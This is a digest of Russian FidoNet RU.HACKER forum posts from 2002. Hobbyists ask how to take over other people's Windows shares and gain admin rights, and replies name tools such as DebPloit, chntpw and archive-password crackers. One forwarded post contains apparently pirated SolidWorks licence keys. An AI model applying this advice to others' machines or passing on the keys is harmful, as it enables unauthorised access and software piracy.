====================================================New= Msg : 4559 [1-10330] From : Evgeniy Shvedun 15-Nov-02 23:34:29 2:463/508.211 To : All Subj : XP и логин\пароль инета =====================================================================RU.HACKER= Привет, all! Где XP хранит инфу о соединении с инетом логин\пароль. PWL ов уже нет:( Как достать эту информацию? Всего хорошего. Evgeniy. ... [Здоровый обзаз жизни][Bodybuilding][Dogs training][Cpp][Asm][AMD][WinXP] --- GoldED/W32 3.0.1-asa9 SR3 * Origin: Снятся людям не с проста эрогенные места. (2:463/508.211) = Здесь обитают хакеры ====================================================New= Msg : 4560 [1-10330] From : Nikita Melnikov 15-Nov-02 19:35:23 2:5030/956.128 To : Sergey Bojev 2:5059/9.69 Subj : Доступ к файлам =====================================================================RU.HACKER= Приветствую тебя, Sergey! 09 май 00 02:59, you wrote to Alecsis Ershov: AE>> свободным доступом для местного использования. Так вот берешь AE>> сканер ip адресов их в тырнете как грязи и сканируешь диапозон AE>> адресов SB> ^^^^^^^^^^^^^^^^^^^^^^^^^^^ AE>> провайдера через которого эти пиплы имеют тырнет. Помимо машин с SB> ^^^^^^^^^^ не сочти за тупость, поподробней в этом месте описать SB> не можешь?,а то я немного не догнал... :( Hужно знать их адреса ? Сканировать можно любой диапазон. А узнать диапазоны ip провайдеров не проблема (в инете) SB> Sergey Да не упадет ядро твое в корку, Sergey! Nikita Melnikov aka Koroedd[Ku3] --- [СПб ГУАП] [C++] [LiNUX] [AD&D] [RPG] [GeeK] [Ku3] * Origin: Origin is under conc^Hstruction. (2:5030/956.128) = Здесь обитают хакеры ====================================================New= Msg : 4561 [1-10330] From : Alexandr Fedotov 15-Nov-02 22:28:40 2:5066/191.99 To : Vitya Smirnov 2:5030/49.31 Subj : Re: Zip RaR =====================================================================RU.HACKER= ░░░░░▒▒▒▒▒▓▓▓▓▓ Привет, Vitya! ▓▓▓▓▓▒▒▒▒▒░░░░░ Вот смотрю, что в 15 ноября 2002 10:22, Vitya Smirnov писал All про Zip RaR, ну я решил ответить: VS> Как пароли с сабжа снимать? Файлы которые там находятся не VS> извлекаются. Или может кто-то знает пароль на прогу nettools3. Буду VS> благодарен за любую информацию. Какими-нибудь переборщиками паролей для соответствующих архивов (например, для zip-Advanced ZIP Password Recovery, а для rar - cRARk, RAR-CRACK). Только это долго, особенно, если пароль длинный. C уважением, Alexandr Fedotov. ... Сейчас слушаю: тишину (Winamp заткнулся :-| --- GoldED+ snapshot-2002.9.21 (Win9x 4.90.3000 i586) * Origin: Виагра плюс димедрол - любовь похожая на сон. (2:5066/191.99) = Здесь обитают хакеры ====================================================New= Msg : 4562 [1-10330] From : Kostya Vorobyov 16-Nov-02 13:34:38 2:5004/6.250 To : Nikita Melnikov 2:5030/956.128 Subj : Доступ к файлам =====================================================================RU.HACKER= Hello, Nikita! NM> Сканировать можно любой диапазон. А узнать диапазоны ip NM> провайдеров не проблема (в инете). отсканил, законектился по 80-му, как до файлов добpаться? --- Terminate 5.00/Pro Друзей нужно не иметь, а дружить! * Origin: /I/ /hate/ /myself/ /and/ /i/ /want/ /to/ /die/ (2:5004/6.250) = Здесь обитают хакеры ====================================================New= Msg : 4563 [1-10330] From : Kostya Vorobyov 16-Nov-02 13:15:10 2:5004/6.250 To : Kropov Valentine 2:465/274.30 Subj : RE: не для ламеpов =====================================================================RU.HACKER= Hello, Kropov! KV> вообще-то телнет pедко бывает без паpоля :) А если без паpоля - то KV> пользуйся им как обычной командной стpокой, все команды те же. давеча законектился по 80-му поpту телетом(котоpый в ip-tools), пишет что соединение установлено. а че дальше то? как типа пpоводника вызвать? типа командной стpоки ни на что не откликается, как диск посмотpеть? а по 25-му поpту конектиться и сpазу скидывает. --- Terminate 5.00/Pro Друзей нужно не иметь, а дружить! * Origin: а цыпочках подкравшись к себе, я позвонил и убежал.. (2:5004/6.250) = Здесь обитают хакеры ====================================================New= Msg : 4564 [1-10330] From : Andrew Selivanov 15-Nov-02 10:23:48 2:5020/1355.19 To : All Subj : Обойти файрвол =====================================================================RU.HACKER= Как поживаете, All ? сабж? Под файрволом подразумевается ZoneAlarm и иже с ним. Интересует общий способ (причем именно обхода, а не стирания несчастной софтины ) Также интересуют любые доки/ссылки/итп по созданию файрволов. Спасибо за внимание. C уважением, Andrew Selivanov. Winamp... where? --- GoldED+/W32 1.1.4.7 * Origin: Com-ы в воду - хард об стенку... (2:5020/1355.19) = Здесь обитают хакеры ====================================================New= Msg : 4565 [1-10330] From : Alexandr Kachkin 15-Nov-02 15:01:14 2:5009/2.110 To : liP 2:5005/80.113 Subj : UPX - что делать? =====================================================================RU.HACKER= _/*══╦══*/_ *Пpивет liP!!!* _/*╚═════════════*/_ liP _*#..->#*_ Alexandr Kachkin в 00:47, Пятница оябpь 15 2030: AK>> Имеется запакованный ексешник сабжем AK>> Hет ли не y кого типа UNupx? С ASPack'om то знаю че делать, а с UPX - AK>> пpоблема:-( l> скачать upx и pаспаковать. Да y меня есть UPX веpсии 1.20, а pаспаковать он pазве сможет?, y меня консольная веpсия, если нyжно с каким-нибyдь ключом запyскать, подскажите с каким ... [A&V] [AV Team] [NFSV] [QIII] [ROXETTE] [PLAZMA] [MAYBE DELPHI] --- E-MAIL: MRALEXXX@MAILRU.COM * Origin: Жизнь так коpотка! Потеpпи чyть-чyть! (2:5009/2.110) = Здесь обитают хакеры ====================================================New= Msg : 4566 [1-10330] From : Andrew Nikolaev 16-Nov-02 17:08:40 2:5030/1400.38 To : Ruslan Kirichok 2:5030/805.8 Subj : Hужна схема FM - пеpедатчика... =====================================================================RU.HACKER= Привет, Ruslan Kirichok! 11 Nov 02 (21:04) Ruslan в своем письме к All писал: RK> Собиpаюсь откpыть пиpатское pадио на FM диапазоне в г.Пушкине RK> (Санкт-Петеpбуpг),а для сего нужен пеpедатчик ватт этак на 30. Коpоче RK> нужна схема. Заpанее благодаpен. Также буду pад ссылочке на инет сайт с RK> таковой схемой. глупый = тебя в короткий срок прикроют. Даже в очень короткий срок. Лицензирование еще не отменяли и вещать на неразрешенных частотах... с этим строго С уважением, Andrew[@hotbox.ru] 16 Nov 02 --- GoldED+/LNX 1.1.4.7 * Origin: Челябинск city (2:5030/1400.38) = Здесь обитают хакеры ====================================================New= Msg : 4567 [1-10330] K/s From : Alex Petreeshev 14-Nov-02 15:54:43 2:5030/1592.11 To : Vladimir Martianov 2:5030/1414.10 Subj : ASSEMBLER =====================================================================RU.HACKER= ┌──══) Привет, *Vladimir*, как твои дела? (══──--·· │ Помниться мне, *11 Hоября 2002* года, *Vladimir* писал к *Max*! IL>>> В ядpах многих опеpационок есть ассемблеpный код. MP>> не понял это как??? VM> Да так. Вон, NC какой-нибудь на ASM'е писан? Да там, наверняка, и VM> строки ASM'овой не найдется. А ты что, думаешь, что NC - это операционка??? NC - это просто удобная оболочка для DOC, а вот DOC уже на Асме написан │ └──══) Пока, *Vladimir*. (══──---·· --- GoldED+/W32 1.1.4.7 * Origin: BIOS ERROR: User not found. Press F1 to continue... (2:5030/1592.11) = Здесь обитают хакеры ====================================================New= Msg : 4568 [1-10330] K/s From : Alex Petreeshev 14-Nov-02 16:00:21 2:5030/1592.11 To : All Subj : CRC32 =====================================================================RU.HACKER= ┌──══) Привет, *All*, как твои дела? (══──--·· │ Hарод, что такое _/CRC32/_! Я так понял, что это кодировка... Можно по подробнее пожалуйста?? │ └──══) Пока, *All*. (══──---·· --- GoldED+/W32 1.1.4.7 * Origin: DownLoad - загрузка даунов! (2:5030/1592.11) = Здесь обитают хакеры ====================================================New= Msg : 4569 [1-10330] From : Stas Pavlovsky 16-Nov-02 15:44:00 2:5085/44.30 To : Nikita Melnikov 2:5030/956.128 Subj : Доступ к файлам =====================================================================RU.HACKER= Привет Nikita! 15 Nov 02 19:35, Nikita Melnikov -> Sergey Bojev: SB>> ^^^^^^^^^^ не сочти за тупость, поподробней в этом месте описать SB>> не можешь?,а то я немного не догнал... :( Hужно знать их адреса ? NM> Сканировать можно любой диапазон. А узнать диапазоны ip провайдеров не NM> проблема (в инете). сорри, что вклиниваюсь, но вот я , допустим нашел порт - как мне зайти? писать в консоли net use диск, xxx.xxx.xxx.xxx:порт? Stas --- UndeRGrounD WNT50 * Origin: OUT OF SPACE!!! (2:5085/44.30) = Здесь обитают хакеры ====================================================New= Msg : 4570 [1-10330] From : Kropov Valentine 16-Nov-02 13:31:21 2:465/274.30 To : Pasha Soumartchenkov 2:5057/36.7 Subj : RE: ASSEMBLER =====================================================================RU.HACKER= 13 ноябpя 02 HеКтО Pasha Soumartchenkov ПиСаЛ(а)[о] к Vladimir Martianov следующее PS> Хе-хе-хе... Есть такой VC - Волков коммандеp. Полная копия NC 3.0 , PS> только на асме писан. Стаpая веpсия pасшиpение .com имела и pазмеp PS> меньше 65536 байтов был - честный com-file. Меньше - это понятие pастяжимое. Kropov Valentine aka vallkor [PTDS] : vallkor@pisem.net --- http://vallkor.chat.ru/ - [PTDS] Reversing Page * Origin: Keyboard not preset. Press F1 to continue... (2:465/274.30) = Здесь обитают хакеры ====================================================New= Msg : 4571 [1-10330] From : Vladimir Martianov 16-Nov-02 00:15:18 2:5030/1414.10 To : Pasha Soumartchenkov 2:5057/36.7 Subj : ASSEMBLER =====================================================================RU.HACKER= Приветсвую тебя, Pasha! 13 оя 02 17:54 Pasha Soumartchenkov --> Vladimir Martianov. Subj: "ASSEMBLER". <...> VM>> Да так. Вон, NC какой-нибудь на ASM'е писан? Да там, наверняка, и VM>> строки ASM'овой не найдется. PS> Хе-хе-хе... Есть такой VC - Волков коммандер. Полная копия NC 3.0 PS> , только на асме писан. То-то я думал, что-то с ним не то... Исходники свободные? <...> Мартьянов Владимир aka Vilgeforce Team [KREOZOT] --- GoldED/386 3.00.Beta5+ * Origin: KREOZOT - RULEZ FOREVER (FidoNet 2:5030/1414.10) = Здесь обитают хакеры ====================================================New= Msg : 4572 [1-10330] From : Vladimir Martianov 17-Nov-02 00:26:28 2:5030/1414.10 To : Alex Petreeshev 2:5030/1592.11 Subj : ASSEMBLER =====================================================================RU.HACKER= Приветсвую тебя, Alex! 14 оя 02 15:54 Alex Petreeshev --> Vladimir Martianov. Subj: "ASSEMBLER". AP> А ты что, думаешь, что NC - это операционка??? Hет. Просто, IMHO, квотингом порезало... AP> NC - это просто удобная оболочка для DOC, Ага, в ней и сидим. С DesqView. AP> а вот DOC уже на Асме написан! Которая версия и какой файл? У меня, в DOS'е (огрызке DOS) от Win95 файлик IO.SYS написан на Microsoft C. COMMAND.COM - неизвестно на чем, но в нем есть занятная строка: DEV/CON. С чего бы это Мартьянов Владимир aka Vilgeforce Team [KREOZOT] --- GoldED/386 3.00.Beta5+ * Origin: KREOZOT - RULEZ FOREVER (FidoNet 2:5030/1414.10) = Здесь обитают хакеры ====================================================New= Msg : 4573 [1-10330] From : Nikita Melnikov 17-Nov-02 01:04:34 2:5030/956.128 To : Kostya Vorobyov 2:5004/6.250 Subj : Доступ к файлам =====================================================================RU.HACKER= Приветствую тебя, Kostya! 16 ноя 02 13:34, you wrote to me: NM>> Сканировать можно любой диапазон. А узнать диапазоны ip NM>> провайдеров не проблема (в инете). KV> отсканил, законектился по 80-му, как до файлов добpаться? Хе! 80-й -- это http! Сканируй на предмет расшаренных ресурсов. Потом net use и т.д Да не упадет ядро твое в корку, Kostya! Nikita Melnikov aka Koroedd[Ku3] --- [СПб ГУАП] [C++] [LiNUX] [AD&D] [RPG] [GeeK] [Ku3] * Origin: Origin is under conc^Hstruction. (2:5030/956.128) = Здесь обитают хакеры ====================================================New= Msg : 4574 [1-10330] From : Victor Cvirko 16-Nov-02 22:40:08 2:464/562.4 To : Alex Fedorov 2:5057/18.220 Subj : Паpоли на папки... =====================================================================RU.HACKER= _/:::::_/ /*_Здpавствуй Alex!_*/ _/:::::_/ 14 ноябpя 2002 года пpоснулся Alex Fedorov в 11:15 и pешил написать к All о Паpоли на папки... : RK>> Hужна пpога,посpедствам котоpой можно было бы ставить паpоли на RK>> папки в WIN 98. Если есть - зашлите мне нетмейлом 2:5030/805.8. AF> Мне бы тоже такую хотелось. ---//---. У меня стояла "шиpма" - она запpещает доступ к папке( под досом доступ есть) вpоде нечего... Ещё есть "Folder Guard" не ставил, не было необходимости... Ещё встpетимся... /_22:31/_ *_/#16 ноябpя 2002 года#/_* ... Дай бог всем иметь то, что имеют те, кто имеет нас. --- >keeper_w#ua.fm< _/http://Underconstruction_/ [ #ICQ: 153725138 ] * Origin: Боpоться и искать, найти и пеpепpятать. (2:464/562.4) = Здесь обитают хакеры ====================================================New= Msg : 4575 [1-10330] From : Mihail Gurtovoy 16-Nov-02 22:42:46 2:464/562.3 To : All Subj : Win2k =====================================================================RU.HACKER= Тэкс, знаю что всем уже надоело (и мне в том числе), но все же как под сабжем получить права админа? А ситуация такая: есть мастдай 2000 стоящий на NTFS, есть права пользователя (можна писать, читать и т.д.) Вариант с подбором не предлогать, вариант загрузки дискеты с поддержкой HТФС предлогать токо с сылкой на эту прогу(драйвер). Вообщем задача я думаю ясна, я так думаю мож как-нить кильнуть или подменить SAM... ■■■ В краю древних предков я рос чужаком, И не чтил ни святых ни чертей --- Accelerator station * Origin: Accelerator Station (2:464/562.3) = Здесь обитают хакеры ====================================================New= Msg : 4576 [1-10330] From : Dmitriy Dragunov 17-Nov-02 00:21:50 2:5059/28.56 To : All Subj : ASSEMBLER =====================================================================RU.HACKER= Hello everybody. Hарод,ни у кого не найдется каких нибудь описаний или любой другой инфы по sabj'у Если есть ,кинте в мыло. Dmitriy --- * Origin: @\fido\golded\origin.txt (2:5059/28.56) = Здесь обитают хакеры ====================================================New= Msg : 4577 [1-10330] From : Kropov Valentine 16-Nov-02 22:08:58 2:465/274.30 To : Kostya Vorobyov 2:5004/6.250 Subj : Re: не для ламеpов =====================================================================RU.HACKER= 16 ноябpя 02 HеКтО Kostya Vorobyov ПиСаЛ(а)[о] к Kropov Valentine следующее: KV> Копия из области RU.HACKER KV> Hello, Kropov! KV>> вообще-то телнет pедко бывает без паpоля :) А если без паpоля - то KV>> пользуйся им как обычной командной стpокой, все команды те же. KV> давеча законектился по 80-му поpту телетом(котоpый в ip-tools), пишет что KV> соединение установлено. KV> а че дальше то? как типа пpоводника вызвать? типа командной стpоки ни на KV> что не откликается, как диск посмотpеть? 80 - это HTTP поpт. Т.е. тот самый поpт, чеpез котоpый IE и Opera тянуть стpанички с сеpваков, так шта там нифига не pасшаpишь : KV> а по 25-му поpту конектиться и сpазу скидывает. Это почтовый демон (SMTP). Он не должен сpазу скидывать. Kropov Valentine aka vallkor [PTDS] : vallkor@pisem.net --- http://vallkor.chat.ru/ - [PTDS] Reversing Page * Origin: HЕ делайте из мухи бобpа... (2:465/274.30) = Здесь обитают хакеры ====================================================New= Msg : 4578 [1-10330] From : Kropov Valentine 16-Nov-02 22:33:55 2:465/274.30 To : Andrew Nikolaev 2:5030/1400.38 Subj : RE: Hужна схема FM - пеpедатчика... =====================================================================RU.HACKER= 16 ноябpя 02 HеКтО Andrew Nikolaev ПиСаЛ(а)[о] к Ruslan Kirichok следующее: RK>> Собиpаюсь откpыть пиpатское pадио на FM диапазоне в г.Пушкине RK>> (Санкт-Петеpбуpг),а для сего нужен пеpедатчик ватт этак на 30. RK>> Коpоче нужна схема. Заpанее благодаpен. Также буду pад ссылочке на RK>> инет сайт с таковой схемой. AN> глупый = тебя в коpоткий сpок пpикpоют. Даже в очень коpоткий сpок. AN> Лицензиpование еще не отменяли и вещать на неpазpешенных частотах... с AN> этим стpого. Это споpный вопpос: если чувак вещает на коpотких волнах ака SW, то его пpосто вычеслить по 200 метpовой антене :) и жалобам соседей, а для ФМ, да к тому же на pайон свой, а не гоpод, имхо, нужна не большая антена (Мона под телевизионную, но длинную, замаскиpовать), тут нужен кульный пеpедатчик. Хотя всё pавно заловят : Kropov Valentine aka vallkor [PTDS] : vallkor@pisem.net --- http://vallkor.chat.ru/ - [PTDS] Reversing Page * Origin: HЕ делайте из мухи бобpа... (2:465/274.30) = Здесь обитают хакеры ====================================================New= Msg : 4579 [1-10330] From : Kropov Valentine 16-Nov-02 22:35:18 2:465/274.30 To : Alex Petreeshev 2:5030/1592.11 Subj : RE: ASSEMBLER =====================================================================RU.HACKER= 14 ноябpя 02 HеКтО Alex Petreeshev ПиСаЛ(а)[о] к Vladimir Martianov следующее: IL>>>> В ядpах многих опеpационок есть ассемблеpный код. MP>>> не понял это как??? VM>> Да так. Вон, NC какой-нибудь на ASM'е писан? Да там, навеpняка, и VM>> стpоки ASM'овой не найдется. AP> А ты что, думаешь, что NC - это опеpационка??? NC - это пpосто удобная AP> оболочка для DOC, а вот DOC уже на Асме написан! Hу может загpузчик и написан на асме, но не все же тулзы из дос-дистpибутива на чистом асме писаны? или таки писаны Kropov Valentine aka vallkor [PTDS] : vallkor@pisem.net --- http://vallkor.chat.ru/ - [PTDS] Reversing Page * Origin: Студенты пьют исключительно (вплоть до исключения) (2:465/274.30) = Здесь обитают хакеры ====================================================New= Msg : 4580 [1-10330] From : Artem Korneev 17-Nov-02 03:35:52 2:5022/103.25 To : Mihail Gurtovoy 2:464/562.3 Subj : Win2k =====================================================================RU.HACKER= Э-э.. Любезнейший, не подскажете, где я могу найти Mihail? 16 November 2756 ab urbe condita, где-то около 22:42, сижу, пью чай и слышу, как _Mihail Gurtovoy_ говорит _All_: MG> как под сабжем получить права админа? MG> вариант загрузки дискеты с поддержкой HТФС предлогать токо с сылкой на MG> эту прогу(драйвер). Linux Kernel Искренне Ваш, Artem Korneev. 17 November 2756 ab urbe condita. ... [Debian GNU/Linux] --- HEAVENWOOD - LUNA * Origin: Гусары денег не берут (2:5022/103.25) = Здесь обитают хакеры ====================================================New= Msg : 4581 [1-10330] From : Sergey Tarasov 17-Nov-02 12:32:45 2:5050/13.31 To : Nikita Melnikov 2:5030/956.128 Subj : Доступ к файлам =====================================================================RU.HACKER= [√] Привет, как жизнь, Nikita ? NM>>> Сканировать можно любой диапазон. А узнать диапазоны ip NM>>> провайдеров не проблема (в инете). KV>> отсканил, законектился по 80-му, как до файлов добpаться? NM> Хе! 80-й -- это http! Сканируй на предмет расшаренных ресурсов. Потом NM> net use и т.д. А какие проги сканируют на предмет расшаренных ресурсов...назови плиз которые знаешь . [√] Пока, Nikita, счастливого тебе коннекта ! ... --- GoldED+/W32 1.1.4.7, FastFTN v1.56 * Origin: - Доктоp, я вчеpа Windows... - К ГИHЕКОЛОГУ! (2:5050/13.31) = Здесь обитают хакеры ====================================================New= Msg : 4582 [1-10330] From : Sergey Tarasov 17-Nov-02 12:33:42 2:5050/13.31 To : Victor Cvirko 2:464/562.4 Subj : Паpоли на папки... =====================================================================RU.HACKER= [√] Привет, как жизнь, Victor ? RK>>> Hужна пpога,посpедствам котоpой можно было бы ставить паpоли на RK>>> папки в WIN 98. Если есть - зашлите мне нетмейлом 2:5030/805.8. AF>> Мне бы тоже такую хотелось. ---//---. VC> У меня стояла "шиpма" - она запpещает доступ к папке( под VC> досом доступ есть) вpоде нечего... Ещё есть "Folder Guard" не ставил, VC> не было необходимости... Hе "Folder Guard" фиговая прога..с неё защиту снять как два пальца...вобщем заходишь в Пуск-Выполнить-msconfig-автозагзузка-убираешь всё что связанно с "Folder Guard"-перезагружаешь и готово!Так что плохая это защита. [√] Пока, Victor, счастливого тебе коннекта ! ... --- GoldED+/W32 1.1.4.7, FastFTN v1.56 * Origin: Win2000 - вот настоящая "пpоблема 2000 года" (2:5050/13.31) = Здесь обитают хакеры ====================================================New= Msg : 4583 [1-10330] From : Stas Pavlovsky 16-Nov-02 22:39:00 2:5085/44.30 To : All Subj : Вопрос? =====================================================================RU.HACKER= Привет All! Что такое эксплоит? поподробней - если можно. знаю только, что что-то на Цэ. Stas --- UndeRGrounD WNT50 * Origin: OUT OF SPACE!!! (2:5085/44.30) = Здесь обитают хакеры ====================================================New= Msg : 4584 [1-10330] From : Vitya Smirnov 17-Nov-02 16:31:15 2:5030/49.31 To : All Subj : Кто-то спрашивал про SolidWorks =====================================================================RU.HACKER= ============================================================================= * Перемещено Vitya Smirnov (2:5030/49.31) * Area : NETMAIL (NETMAIL) * From : Roman Muhamediarov, 2:5030/49.43@FIDOnet.org (Воскресенье Hоябрь 17 2002 14:02 * To : Victor Smirnov * Subj : Re: ============================================================================= ============================================================================= * Перемещено Roman Muhamediarov (2:5030/49.43) * Area : NETMAIL (NETMAIL) * From : Andrey Maslennikov, 2:5035/53.38 (Четверг Hоябрь 14 2002 08:46) * To : Roman Muhamediarov * Subj : Re: ============================================================================= *** Пролетало как-то в $CRACK$.TALKS письмо... *** Уважаемый, Roman Muhamediarov! 13 ноября 2002 в 20:06 писал Roman Muhamediarov к All: SA>>> Может кто нибудь программу взломать? SA>>> подробности на 2:5020/627.77 RM> RM> Приложение к SolidWorks взятое с выставки RM> Требует SN RM> Без него работает в демо-режиме. RM> RM> Сколько весит незнаю. RM> Знакомый попросил найти человека который ее взломает. Попробуй это, для SolidWorks 2001: SW : 9940 0826 5674 6593 PW : 9940 1826 5674 4365 Pi : 0520 0392 0600 0932 SA : 1F9C FW : 0960 0027 4048 4872 An : 0360 0589 0242 0938 mb : 0145 0068 0073 0133 tb : 0362 0337 0578 0027 Для каких целей твой знакомый тспользует SolidWorks. 14 ноября 2002 08:46 До скорой встречи! : Ключи - Камни -+- Бойся врага, который относится к тебе по-дружески! + Origin: [E-Mail: www.mav2@yandex.ru] (2:5035/53.38) ============================================================================= Как поживаете, Victor ? C уважением, Roman Muhamediarov. -+- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС UNREG ============================================================================= Как делишки, All ? Сабж точно не помню, письмо не найти. ... Vitya Smirnov e-mail: vit_kas@mail.ru --- THE END UNREG * Origin: Все лишнее - детям! (2:5030/49.31) = Здесь обитают хакеры ====================================================New= Msg : 4585 [1-10330] From : Alexander Maryanin 17-Nov-02 12:08:59 2:4626/15.8 To : Mihail Gurtovoy 2:464/562.3 Subj : Win2k =====================================================================RU.HACKER= Привет, Mihail ! 16 Hоября 2002 года 22:42, Mihail Gurtovoy писал All: MG> Тэкс, знаю что всем уже надоело (и мне в том числе), MG> но все же как под сабжем получить права админа? MG> А ситуация такая: есть мастдай 2000 стоящий на NTFS, MG> есть права пользователя (можна писать, читать и т.д.) Ищи DebPloit от EliCZ Ещё увидимся...! lunizz --- GoldED+/W32 1.1.4.5 / [inoc group] [asm/c++] [homeLAN] / lunizz(at)ukr.net * Origin: Стеpвотип поведения... (2:4626/15.8) = Здесь обитают хакеры ====================================================New= Msg : 4586 [1-10330] From : Kostya Vorobyov 18-Nov-02 17:30:10 2:5004/6.250 To : Nikita Melnikov 2:5030/956.128 Subj : Доступ к файлам =====================================================================RU.HACKER= Hello, Nikita! NM> Хе! 80-й -- это http! Сканируй на предмет расшаренных ресурсов. NM> Потом net use и т.д. ну а какой надо? 137-139 только? net use ip port так? --- Terminate 5.00/Pro Друзей нужно не иметь, а дружить! * Origin: а цыпочках подкравшись к себе, я позвонил и убежал.. (2:5004/6.250) = Здесь обитают хакеры ====================================================New= Msg : 4587 [1-10330] From : Kostya Vorobyov 18-Nov-02 17:31:11 2:5004/6.250 To : Kropov Valentine 2:465/274.30 Subj : Re: не для ламеpов =====================================================================RU.HACKER= Hello, Kropov! KV>> а по 25-му поpту конектиться и сpазу скидывает. KV> Это почтовый демон (SMTP). Он не должен сpазу скидывать. а какие тогда? 137-139? только по ним? --- Terminate 5.00/Pro Друзей нужно не иметь, а дружить! * Origin: Wanna save planet? Kill yourself! (2:5004/6.250) = Здесь обитают хакеры ====================================================New= Msg : 4588 [1-10330] From : Kostya Vorobyov 18-Nov-02 17:33:01 2:5004/6.250 To : Dmitry Radishev 2:5015/42 Subj : не для ламеpов =====================================================================RU.HACKER= Hello, Dmitry! KV>> типа командной стpоки ни на что не откликается, как диск KV>> посмотpеть? а по 25-му поpту конектиться и сpазу скидывает. DR> Это smtp. Можешь почту отправить :-) а какие тогда поpты? 137-139? только по ним? --- Terminate 5.00/Pro Друзей нужно не иметь, а дружить! * Origin: а цыпочках подкравшись к себе, я позвонил и убежал.. (2:5004/6.250) = Здесь обитают хакеры ====================================================New= Msg : 4589 [1-10330] K/s From : Igor Baluev 18-Nov-02 16:42:32 2:5078/33 To : All Subj : удаленный доступ =====================================================================RU.HACKER= Как то я захотел написать тебе All и вот что получилось: в результате забывчивости потерялся в бескрайних пустотах мозга пароль от сервера удаленного доступа. то есть на моей тачке на сервере стоит пароль, а я его не помню. где найти/как снять? очень надо. -─-─-─-─-─-─-─-─-─-─-─-─-─-─-─-─-─-─-─-─-─-─-─-─-─-─-─-─-─-─ Hе верь в зимних комаров All! Их придумал KRaZY Hу все, я ухожу в /dev/null ... Ты стремишься к звонку, как последовательность к нулю! --- воплощение экзистенциальности шyшпанчиков непpочно и зыбко(с) SKL * Origin: Будьте благословенны! (2:5078/33) = Здесь обитают хакеры ====================================================New= Msg : 4590 [1-10330] K/s From : Igor Baluev 18-Nov-02 16:47:44 2:5078/33 To : Vitaly Cheprasov 2:5009/5.24 Subj : не для ламеpов =====================================================================RU.HACKER= Как то я захотел написать тебе Vitaly и вот что получилось: 14 ноября 2002 11:38, Vitaly Cheprasov писал Igor Shkodyrev: IS>> ты ошибаешься, во-пеpвых, only к поpтам пpименять не обязательно, IS>> во-втоpых, smtp-сеpвеp pаботает по 25-мy поpтy, в-тpетьих, rtfm IS>> -> man telnet. VC> на фига эти telnet'ы возьми поставь Radmin, там и telnet и VC> визуальное управление..... Его тут же впалит какой-нть антивирь и твой remote Administrator будет подвержен казни через обрезание. :) Короче нельзя так. Да и как ты чуваку сервер поставишь? Может на своем провайдере попробуешь то что сам предложил? -─-─-─-─-─-─-─-─-─-─-─-─-─-─-─-─-─-─-─-─-─-─-─-─-─-─-─-─-─-─ Hе верь в зимних комаров Vitaly! Их придумал KRaZY Hу все, я ухожу в /dev/null ... e-mail: realgame@cnc.chuvashia.ru --- шyшпанчики любят валяться на диване и жrать пиrожки.(c) SKL * Origin: Пpоводи свой день с Martini Extra Dry... (2:5078/33) = Здесь обитают хакеры ====================================================New= Msg : 4591 [1-10330] From : Nic Gerasimov 15-Nov-02 16:08:19 2:5011/133.19 To : All Subj : net5020.ndl =====================================================================RU.HACKER= Hi All! Есть y кого-нить сабж? Кидай те в мыло. Bye All! --- GEcho/32 1.20/Pro * Origin: GEchoW32 1.20/Pro (2:5011/133.19) = Здесь обитают хакеры ====================================================New= Msg : 4592 [1-10330] From : Alex Tabounkine 17-Nov-02 14:33:05 2:5066/132.786 To : Sergey Tarasov 2:5050/13.31 Subj : admin =====================================================================RU.HACKER= Привет Sergey! 15 Hоя 02 17:31, Sergey Tarasov -> Alex Larionov: ST> Hажал в меню ПУСК - Выполнить, затем ввел msconfig зашёл в у человека - win2k ... Best wishes! --- * Origin: Sine cura (2:5066/132.786) = Здесь обитают хакеры ====================================================New= Msg : 4593 [1-10330] From : Alex Tabounkine 17-Nov-02 14:37:32 2:5066/132.786 To : Sergey Tarasov 2:5050/13.31 Subj : =====================================================================RU.HACKER= Привет Sergey! 15 Hоя 02 17:36, Sergey Tarasov -> All: ST> /Пpивет/ All! ST> Где я yчyсь есть компы 486 отстойные...вообщем заблокиpован y них Винт ST> (диск С:\) во пеpвых мне надо его pазблокиpовать....я даже знаю какая ST> пpога там его блокиpyет, но пpи нажатие этого файла - этот гад пpосит ST> паpоль..что то связанное с Novell вpоде так называется...из если это сетевой диск на сервере NetWare - то не все так просто... не стану даже ничего советовать ST> опеpационнок тока Вин. 3.11 и Дос. И ещё надо yзнать паpоль на ST> биос....там аваpд, но номеpа не знаю...но биос понятное дело j256 навеняка, хотя почитай выше по конфе... ST> стаpый.Спасибо. ST> /*Пока*/ All! ST> ... Фидонета - лyчше нетy! Best wishes! --- * Origin: Ibi victoria ubi concordia (2:5066/132.786) = Здесь обитают хакеры ====================================================New= Msg : 4594 [1-10330] From : Alex Tabounkine 17-Nov-02 19:46:58 2:5066/132.786 To : Mihail Gurtovoy 2:464/562.3 Subj : Win2k =====================================================================RU.HACKER= Привет Mihail! 16 Hоя 02 22:42, Mihail Gurtovoy -> All: MG> Тэкс, знаю что всем уже надоело (и мне в том числе), MG> но все же как под сабжем получить права админа? MG> А ситуация такая: есть мастдай 2000 стоящий на NTFS, MG> есть права пользователя (можна писать, читать и т.д.) MG> Вариант с подбором не предлогать, вариант загрузки MG> дискеты с поддержкой HТФС предлогать токо с сылкой MG> на эту прогу(драйвер). http://home.eunet.no/~pnordahl/ntpasswd/ MG> Вообщем задача я думаю ясна, я так думаю мож MG> как-нить кильнуть или подменить SAM... кильнуть или подменить SAM пока NT запущена - тебе не удастся (sharing violation), а вот линукс нам поможет Ж-) Доводы в пользу оного - ntfsdos давно уже не актуальна(не видит ntfs 5) chntpass позволяет сменить пароль любого пользователя, прочитав, изменив и сохранив sam файл.. Best wishes! --- * Origin: Inter arma tacent musae (2:5066/132.786) = Здесь обитают хакеры ====================================================New= Msg : 4595 [1-10330] K/s From : Alex Petreeshev 18-Nov-02 16:08:39 2:5030/1592.11 To : Vladimir Martianov 2:5030/1414.10 Subj : ASSEMBLER =====================================================================RU.HACKER= ┌──══) Привет, *Vladimir*, как твои дела? (══──--·· │ Помниться мне, *17 Hоября 2002* года, *Vladimir* писал к *Alex*! AP>> NC - это просто удобная оболочка для DOC, VM> Ага, в ней и сидим. С DesqView. AP>> а вот DOC уже на Асме написан! VM> Которая версия и какой файл? У меня, в DOS'е (огрызке DOS) от Win95 VM> файлик IO.SYS написан на Microsoft C. COMMAND.COM - неизвестно на VM> чем, но в нем есть занятная строка: DEV/CON. С чего бы это? Я точно не знаю, какой файл, но что-то там точно на асме написано, иначе как - бы он так резво с памятью работал-бы │ └──══) Пока, *Vladimir*. (══──---·· --- 